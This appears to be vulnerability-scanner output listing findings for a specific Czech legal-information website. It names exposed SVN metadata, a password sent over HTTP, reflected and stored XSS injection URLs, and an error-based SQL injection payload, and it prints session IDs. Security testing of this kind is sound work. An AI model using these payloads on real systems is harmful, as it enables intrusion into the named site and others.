- *SVN Disclosure
- URL: http://www.itpravo.cz/aaa/.svn/all-wcprops
- *Password Transmitted Over HTTP
- URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- Form target action: /aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- *XSS
- URL: http://www.itpravo.cz/fulltextdisc.shtml?AA_SL_Session=6d8f106740b7ce51e4b9757d038cadb3&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00031E)</script>&add_disc=1
- URL: http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00046E)</script>&add_disc=1
- URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
- Parameter Name: username
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0006BC)</script>
- *Permanent XSS
- URL: http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))&sh_itm=78c4593979090b9c7fddc1f3e12f9ebc&add_disc=1
- Injection URL: http://www.itpravo.cz/fulltextdisc.shtml?
- *[Possible] Permanent Cross-site Scripting
- http://www.itpravo.cz/diskuze/index.shtml?x=2016147&add_disc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&all_ids=Zobraz v?e&c_0=3&h_0=xcea526e78c88df65d2152898b9bc4a96&sel_ids=Zobraz vybrané
- *[Possible] Internal Path Leakage (Windows)
- C:\DOCUME~1\MARTIN~1\LOCALS~1\Temp\msohtmlclip1\01